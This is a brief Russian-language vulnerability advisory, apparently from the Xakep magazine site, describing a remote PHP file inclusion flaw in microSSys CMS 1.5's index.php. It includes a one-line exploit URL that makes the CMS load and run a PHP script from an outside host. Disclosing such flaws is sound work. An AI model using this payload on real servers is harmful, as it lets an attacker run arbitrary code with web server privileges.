PHP-инклюдинг в microSSys CMS

Рекомендуем почитать:

Xakep #286. Sad Guard

Содержание выпуска
Подписка на «Хакер»-60%

Программа: microSSys CMS 1.5

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки
входных данных сценарием index.php. Удаленный пользователь может выполнить
произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Эксплоит:

http://host/index.php?1=lol&PAGES[lol]=http://raz0r.name/s.php

PHP-инклюдинг в microSSys CMS

Xakep #286. Sad Guard

Последние взломы

Уроки форензики. Ищем улики в сетевом трафике

Ангард! Реверсим приложение, защищенное DNGuard

Девайс-невидимка. Встраиваемся в локальную сеть с помощью «невидимого» хакерского устройства

HTB Extension. Пентестим плагин для Gitea и сбегаем из Docker

Компьютерные трюки

Мастерская хакера. ИИ-помощники, работа с JSON и приятные мелочи, которые пригодятся в работе

Крококряк. Снимаем трафик с витой пары обычными «крокодилами»

Linux на диете. Уменьшаем требования Bodhi Linux к оперативной памяти

Как писать статьи. Колонка главреда

Свежие новости

Группировка Winter Vivern использует уязвимость в Zimbra для кражи писем НАТО

Малварь AlienFox ворует данные из 18 облачных сервисов

Администраторы кардерского форума UniCC получили условные сроки

С начала года почти 800 000 фишинговых писем были отправлены с использованием IPFS

Исследователи подменили результаты поиска в Bing, используя уязвимость BingBang